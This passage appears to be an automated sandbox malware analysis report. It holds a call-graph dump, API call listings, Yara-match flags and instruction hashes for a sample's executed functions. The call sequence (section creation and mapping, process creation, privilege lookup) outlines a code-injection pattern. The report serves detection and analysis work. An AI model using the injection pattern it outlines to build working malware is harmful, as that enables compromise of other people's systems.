2b4af30 LdrLoadDll 105920->105921 105922 2b4a7bf LookupPrivilegeValueW 105921->105922 105922->105548 105924 2b4af30 LdrLoadDll 105923->105924 105925 2b4a24c 105924->105925 105929 4d82ea0 LdrInitializeThunk 105925->105929 105926 2b4a26b 105926->105549 105928->105914 105929->105926 105931 2b3b1f0 105930->105931 105932 2b3b040 LdrLoadDll 105931->105932 105933 2b3b204 105932->105933 105933->105483 105935 2b3af34 105934->105935 106007 2b49c60 LdrLoadDll 105935->106007 105937 2b3af6e 105937->105485 105939 2b3f3ac 105938->105939 105940 2b3b1c0 LdrLoadDll 105939->105940 105941 2b3f3be 105940->105941 106008 2b3f290 105941->106008 105944 2b3f3f1 105948 2b4a460 2 API calls 105944->105948 105949 2b3f402 105944->105949 105945 2b3f3e4 105945->105489 105946 2b3f3d9 105946->105945 105947 2b4a460 2 API calls 105946->105947 105947->105945 105948->105949 105949->105489 105951 2b3f43c 105950->105951 106027 2b3b2b0 105951->106027 105953 2b3f44e 105954 2b3f290 3 API calls 105953->105954 105955 2b3f45f 105954->105955 105956 2b3f481 105955->105956 105957 2b3f469 105955->105957 105960 2b4a460 2 API calls 105956->105960 105961 2b3f492 105956->105961 105958 2b3f474 105957->105958 105959 2b4a460 2 API calls 105957->105959 105958->105491 105959->105958 105960->105961 105961->105491 105963 2b3caa6 105962->105963 105964 2b3cab0 105962->105964 105963->105499 105965 2b3af10 LdrLoadDll 105964->105965 105966 2b3cb4e 105965->105966 105967 2b3cb74 105966->105967 105968 2b3b040 LdrLoadDll 105966->105968 105967->105499 105969 2b3cb90 105968->105969 105970 2b44a50 8 API calls 105969->105970 105971 2b3cbe5 105970->105971 105971->105499 105973 2b3d646 105972->105973 105974 2b3b040 LdrLoadDll 105973->105974 105975 2b3d65a 105974->105975 106031 2b3d310 105975->106031 105978 2b3cc00 105979 2b3cc0d 105978->105979 105980 2b3b040 LdrLoadDll 105979->105980 105981 2b3cca9 105979->105981 105980->105981 105982 2b3b040 LdrLoadDll 105981->105982 105983 2b3cd16 105982->105983 105984 2b3af10 LdrLoadDll 105983->105984 105985 2b3cd7f 105984->105985 105986 2b3b040 LdrLoadDll 105985->105986 105987 2b3ce2f 105986->105987 105987->105512 105990 2b38d14 105988->105990 106059 2b3f6d0 105988->106059 106001 2b38f25 105990->106001 106064 2b443a0 105990->106064 105992 2b38d70 105992->106001 106067 2b38ab0 105992->106067 105995 2b4cf00 2 API calls 105996 2b38db2 105995->105996 105997 2b4d030 3 API calls 105996->105997 106002 2b38dc7 105997->106002 105998 2b37ea0 4 API calls 105998->106002 106001->105468 106002->105998 106002->106001 106003 2b3c7b0 18 API calls 106002->106003 106004 2b38160 2 API calls 106002->106004 106073 2b3f670 106002->106073 106077 2b3f080 21 API calls 106002->106077 106003->106002 106004->106002 106005->105486 106006->105509 106007->105937 106009 2b3f2aa 106008->106009 106017 2b3f360 106008->106017 106010 2b3b040 LdrLoadDll 106009->106010 106011 2b3f2cc 106010->106011 106018 2b49f10 106011->106018 106013 2b3f30e 106021 2b49f50 106013->106021 106016 2b4a460 2 API calls 106016->106017 106017->105944 106017->105946 106019 2b4af30 LdrLoadDll 106018->106019 106020 2b49f2c 106019->106020 106020->106013 106022 2b4af30 LdrLoadDll 106021->106022 106023 2b49f6c 106022->106023 106026 4d835c0 LdrInitializeThunk 106023->106026 106024 2b3f354 106024->106016 106026->106024 106028 2b3b2d7 106027->106028 106029 2b3b040 LdrLoadDll 106028->106029 106030 2b3b313 106029->106030 106030->105953 106032 2b3d327 106031->106032 106039 2b3f710 106032->106039 106036 2b3d39b 106037 2b3908b 106036->106037 106050 2b4a270 LdrLoadDll 106036->106050 106037->105978 106040 2b3f735 106039->106040 106051 2b381a0 106040->106051 106042 2b3d36f 106047 2b4a6b0 106042->106047 106043 2b44a50 8 API calls 106045 2b3f759 106043->106045 106045->106042 106045->106043 106046 2b4bd90 2 API calls 106045->106046 106058 2b3f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 106045->106058 106046->106045 106048 2b4af30 LdrLoadDll 106047->106048 106049 2b4a6cf CreateProcessInternalW 106048->106049 106049->106036 106050->106037 106052 2b3829f 106051->106052 106053 2b381b5 106051->106053 106052->106045 106053->106052 106054 2b44a50 8 API calls 106053->106054 106056 2b38222 106054->106056 106055 2b38249 106055->106045 106056->106055 106057 2b4bd90 2 API calls 106056->106057 106057->106055 106058->106045 106060 2b44e50 LdrLoadDll 106059->106060 106061 2b3f6ef 106060->106061 106062 2b3f6f6 SetErrorMode 106061->106062 106063 2b3f6fd 106061->106063 106062->106063 106063->105990 106078 2b3f4a0 106064->106078 106066 2b443c6 106066->105992 106068 2b38ab6 106067->106068 106069 2b4bd10 2 API calls 106068->106069 106072 2b38ad5 106069->106072 106070 2b38cea 106070->105995 106072->106070 106097 2b49850 106072->106097 106074 2b3f683 106073->106074 106145 2b49e60 106074->106145 106077->106002 106079 2b3f4bd 106078->106079 106085 2b49f90 106079->106085 106082 2b3f505 106082->106066 106086 2b4af30 LdrLoadDll 106085->106086 106087 2b49fac 106086->106087 106095 4d82f30 LdrInitializeThunk 106087->106095 106088 2b3f4fe 106088->106082 106090 2b49fe0 106088->106090 106091 2b4af30 LdrLoadDll 106090->106091 106092 2b49ffc 106091->106092 106096 4d82d10 LdrInitializeThunk 106092->106096 106093 2b3f52e 106093->106066 106095->106088 106096->106093 106098 2b4bf60 2 API calls 106097->106098 106099 2b49867 106098->106099 106118 2b39310 106099->106118 106101 2b49882 106102 2b498c0 106101->106102 106103 2b498a9 106101->106103 106106 2b4bd10 2 API calls 106102->106106 106104 2b4bd90 2 API calls 106103->106104 106105 2b498b6 106104->106105 106105->106070 106107 2b498fa 106106->106107 106108 2b4bd10 2 API calls 106107->106108 106109 2b49913 106108->106109 106115 2b49bb4 106109->106115 106124 2b4bd50 LdrLoadDll 106109->106124 106111 2b49b99 106112 2b49ba0 106111->106112 106111->106115 106113 2b4bd90 2 API calls 106112->106113 106114 2b49baa 106113->106114 106114->106070 106116 2b4bd90 2 API calls 106115->106116 106117 2b49c09 106116->106117 106117->106070 106119 2b39335 106118->106119 106120 2b3acf0 LdrLoadDll 106119->106120 106121 2b39368 106120->106121 106123 2b3938d 106121->106123 106125 2b3cf20 106121->106125 106123->106101 106124->106111 106126 2b3cf4c 106125->106126 106127 2b4a1b0 LdrLoadDll 106126->106127 106128 2b3cf65 106127->106128 106129 2b3cf6c 106128->106129 106136 2b4a1f0 106128->106136 106129->106123 106133 2b3cfa7 106134 2b4a460 2 API calls 106133->106134 106135 2b3cfca 106134->106135 106135->106123 106137 2b4af30 LdrLoadDll 106136->106137 106138 2b4a20c 106137->106138 106144 4d82ca0 LdrInitializeThunk 106138->106144 106139 2b3cf8f 106139->106129 106141 2b4a7e0 106139->106141 106142 2b4af30 LdrLoadDll 106141->106142 106143 2b4a7ff 106142->106143 106143->106133 106144->106139 106146 2b4af30 LdrLoadDll 106145->106146 106147 2b49e7c 106146->106147 106150 4d82dd0 LdrInitializeThunk 106147->106150 106148 2b3f6ae 106148->106002 106150->106148

                                  Executed Functions

                                  Function 04B1A036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • NtQueryInformationProcess.NTDLL ref: 04B1A19F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519141738.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4b10000_control.jbxd
                                  Similarity
                                  • API ID: InformationProcessQuery
                                  • String ID: 0
                                  • API String ID: 1778838933-4108050209
                                  • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                  • Instruction ID: 781fc6d401bfbd6ab8094a3b06e0da93eb058276764e87fb69980ce2e8f14387
                                  • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                  • Instruction Fuzzy Hash: 29F11370518A8C8FDB69EF68C894AEEB7E4FF98304F80466AD44ED7250DF34A645CB41
                                  Function 04B19BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 207 4b19baf-4b19bef 208 4b19bf7-4b19bfe 207->208 209 4b19bf2 call 4b19102 207->209 210 4b19c00 208->210 211 4b19c0c-4b19c9a call 4b1b942 * 2 NtCreateSection 208->211 209->208 212 4b19c02-4b19c0a 210->212 217 4b19ca0-4b19d0a call 4b1b942 NtMapViewOfSection 211->217 218 4b19d5a-4b19d68 211->218 212->211 212->212 221 4b19d52 217->221 222 4b19d0c-4b19d4c 217->222 221->218 224 4b19d69-4b19d6b 222->224 225 4b19d4e-4b19d4f 222->225 226 4b19d88-4b19ddc call 4b1cd62 NtClose 224->226 227 4b19d6d-4b19d72 224->227 225->221 228 4b19d74-4b19d86 call 4b19172 227->228 228->226
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519141738.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4b10000_control.jbxd
                                  Similarity
                                  • API ID: Section$CloseCreateView
                                  • String ID: @$@
                                  • API String ID: 1133238012-149943524
                                  • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                  • Instruction ID: 31e349a0998be71fc94a11e8ad4c50bd032ae52171df7bbab6093000093ae220
                                  • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                  • Instruction Fuzzy Hash: 2E61A27011CB488FDB58DF58D8956AABBE0FF98314F50062EE58AC3251DF35E441CB86
                                  Function 04B19BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 267 4b19bb2-4b19bfe call 4b19102 270 4b19c00 267->270 271 4b19c0c-4b19c9a call 4b1b942 * 2 NtCreateSection 267->271 272 4b19c02-4b19c0a 270->272 277 4b19ca0-4b19d0a call 4b1b942 NtMapViewOfSection 271->277 278 4b19d5a-4b19d68 271->278 272->271 272->272 281 4b19d52 277->281 282 4b19d0c-4b19d4c 277->282 281->278 284 4b19d69-4b19d6b 282->284 285 4b19d4e-4b19d4f 282->285 286 4b19d88-4b19ddc call 4b1cd62 NtClose 284->286 287 4b19d6d-4b19d72 284->287 285->281 288 4b19d74-4b19d86 call 4b19172 287->288 288->286
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519141738.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4b10000_control.jbxd
                                  Similarity
                                  • API ID: Section$CreateView
                                  • String ID: @$@
                                  • API String ID: 1585966358-149943524
                                  • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                  • Instruction ID: 7ed9591ae6536149dd1747c8b3e46b57ef253d0a1feabc6b7b51861f4d4275b4
                                  • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                  • Instruction Fuzzy Hash: F5517FB0618B488FDB58DF18D8956AABBE0FB98314F50062EE58AC3651DF35E441CB86
                                  Function 04B1A042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • NtQueryInformationProcess.NTDLL ref: 04B1A19F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519141738.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4b10000_control.jbxd
                                  Similarity
                                  • API ID: InformationProcessQuery
                                  • String ID: 0
                                  • API String ID: 1778838933-4108050209
                                  • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                  • Instruction ID: 7342dac90c92f18c99ca802e69d9e0c8adca26b8674ce5292cf362a68ff802ee
                                  • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                  • Instruction Fuzzy Hash: 02512170918A8C8FDB69EF68C8946EEBBF4FB98305F40466ED44AD7250DF30A645CB41
                                  Function 02B4A330 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 557 2b4a330-2b4a381 call 2b4af30 NtCreateFile
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,02B44BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02B44BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02B4A37D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction ID: eaae1d25e7fbd2045330e6b15b0c80d505cb37fafc53f2ef3fd50df7ee3639ed
                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction Fuzzy Hash: 79F0B2B2211208ABCB08DF88DC94EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                  Function 02B4A3DB Relevance: 1.6, APIs: 1, Instructions: 55filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtReadFile.NTDLL(02B44D72,5EB65239,FFFFFFFF,02B44A31,?,?,02B44D72,?,02B44A31,FFFFFFFF,5EB65239,02B44D72,?,00000000), ref: 02B4A425
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 5fce98419675b8150b1b35dccbc3d588d7963adaf1ac3962f032f5eb02082af7
                                  • Instruction ID: 96b28461775fce61bb4300e76e13b34246676944bffdc9ee7c1a7e9a1de7e8d7
                                  • Opcode Fuzzy Hash: 5fce98419675b8150b1b35dccbc3d588d7963adaf1ac3962f032f5eb02082af7
                                  • Instruction Fuzzy Hash: 580129B2210104ABDB14EF98CC94EEB77A9EF8C354F058689FE1D97251CA30E911CBA0
                                  Function 02B4A3E0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtReadFile.NTDLL(02B44D72,5EB65239,FFFFFFFF,02B44A31,?,?,02B44D72,?,02B44A31,FFFFFFFF,5EB65239,02B44D72,?,00000000), ref: 02B4A425
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction ID: b7155526793d943480481d52a45f1602ad0be7fb4584f1a0b2c9d55fa521682a
                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction Fuzzy Hash: C6F0B7B2210208AFDB14DF89DC90EEB77ADEF8C754F158249BE1D97241DA30E811CBA0
                                  Function 02B4A510 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02B32D11,00002000,00003000,00000004), ref: 02B4A549
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction ID: fcbfe56fc96be541f54301e3a91ee2ef91d9f4e318e870074bf64fa61209e785
                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction Fuzzy Hash: B0F015B2210208ABDB14DF89CC80EEB77ADAF88754F118249BE0897241C630F811CBA0
                                  Function 02B4A50F Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02B32D11,00002000,00003000,00000004), ref: 02B4A549
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 5e53e5ce2ea3479e475aa3b7b5c40d77a45fece3a3a99e57839a720f9b609ce9
                                  • Instruction ID: 8f18f6b7def1d8a1c56050af3a2f1aeeee53e8b907b3876fdbb79fe7953718f1
                                  • Opcode Fuzzy Hash: 5e53e5ce2ea3479e475aa3b7b5c40d77a45fece3a3a99e57839a720f9b609ce9
                                  • Instruction Fuzzy Hash: C7F01CB6210108AFDB14DF99CC80EEB77A9AF88354F15824DFE0997241C630E811CBA0
                                  Function 02B4A460 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.NTDLL(02B44D50,?,?,02B44D50,00000000,FFFFFFFF), ref: 02B4A485
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction ID: b083345bcf0be7d0327492e2f62768a0ce9ae1ea1129846eec2e305298bb02bd
                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction Fuzzy Hash: 8ED01776250214ABE710EB98CC85EE77BADEF48760F154599BA189B242C930FA008BE0
                                  Function 04D82CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 066b97016a746e425dc8c6638efe089d8e6561e715f554239b00b415b8d96dba
                                  • Instruction ID: e93d57fb6a4c7c65659cf8230d2fe00ec98f7171d21c9a6904cbfd2e9ac41c17
                                  • Opcode Fuzzy Hash: 066b97016a746e425dc8c6638efe089d8e6561e715f554239b00b415b8d96dba
                                  • Instruction Fuzzy Hash: 8790023121140402F7007598540864600558BE1705F55D011B502D665EC665DD917135
                                  Function 04D82C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d4f38b5698780f1fb1de0f3f58cf64f7eafc31934833e20118bce595e0687b04
                                  • Instruction ID: 444babd9454f1044ad6d2e3a2e74c55f6ea605a974ce883a5b176b55918f0dfb
                                  • Opcode Fuzzy Hash: d4f38b5698780f1fb1de0f3f58cf64f7eafc31934833e20118bce595e0687b04
                                  • Instruction Fuzzy Hash: 0090023121148802F7107158840474A00558BD1705F59C411B442D768D8695DD917125
                                  Function 04D82C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 21d04c4ca87d284c73c44020d8b31f5449afec4b14082520945e52cf6a798ace
                                  • Instruction ID: 0104df20b333723f97dce76321baaef37a17fbb6c22aa3914bb8c6fbd173accb
                                  • Opcode Fuzzy Hash: 21d04c4ca87d284c73c44020d8b31f5449afec4b14082520945e52cf6a798ace
                                  • Instruction Fuzzy Hash: EF90023121140842F70071584404B4600558BE1705F55C016B012D764D8615DD517525
                                  Function 04D82DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 007f53a5f67a67ffdd7e918dd5e33298c321d6cd35e32267dcc014ea9be2ec4a
                                  • Instruction ID: 44d50dda8bb5073525cc4648169151d38ad997e8a438adb9ac24907e41b2b830
                                  • Opcode Fuzzy Hash: 007f53a5f67a67ffdd7e918dd5e33298c321d6cd35e32267dcc014ea9be2ec4a
                                  • Instruction Fuzzy Hash: E8900221252441527B45B158440450740569BE1645795C012B141DA60C8526ED56E625
                                  Function 04D82DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 00a02686b5e17a1c46970b0d8ad1671f0b0cec2bc04faaaab3a5aef3e44685d8
                                  • Instruction ID: 9f2aa6387aebec8eaa5f61f13e9f323e2affe330e104d450dace8316d7fec606
                                  • Opcode Fuzzy Hash: 00a02686b5e17a1c46970b0d8ad1671f0b0cec2bc04faaaab3a5aef3e44685d8
                                  • Instruction Fuzzy Hash: CF90023121140413F7117158450470700598BD1645F95C412B042D668D9656DE52B125
                                  Function 04D82D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 28b6352ae569bde33e546b5e3fd126f54d8b485d66b969547303a2b83c8f240a
                                  • Instruction ID: b4610c2551742a6ca9eba68d8a86852864e94b63fb9a7fa26c8b972b6eb86309
                                  • Opcode Fuzzy Hash: 28b6352ae569bde33e546b5e3fd126f54d8b485d66b969547303a2b83c8f240a
                                  • Instruction Fuzzy Hash: 8C90022922340002F7807158540860A00558BD2606F95D415B001E668CC915DD696325
                                  Function 04D82EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 687ab681d094207d9ef190b7729f2f518e0e6629e0f86e74c974683fbfc539bd
                                  • Instruction ID: 65a16140e665ad63a52fe8999f3b31bd43633f77df23ac03b6e38a84199c2b6c
                                  • Opcode Fuzzy Hash: 687ab681d094207d9ef190b7729f2f518e0e6629e0f86e74c974683fbfc539bd
                                  • Instruction Fuzzy Hash: 9B90027121140402F7407158440474600558BD1705F55C011B506D664E8659DED57669
                                  Function 04D82FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 894c120c9397dcfed62150273ede9edd831f9e52f4b8c009943c3e7a3689d32f
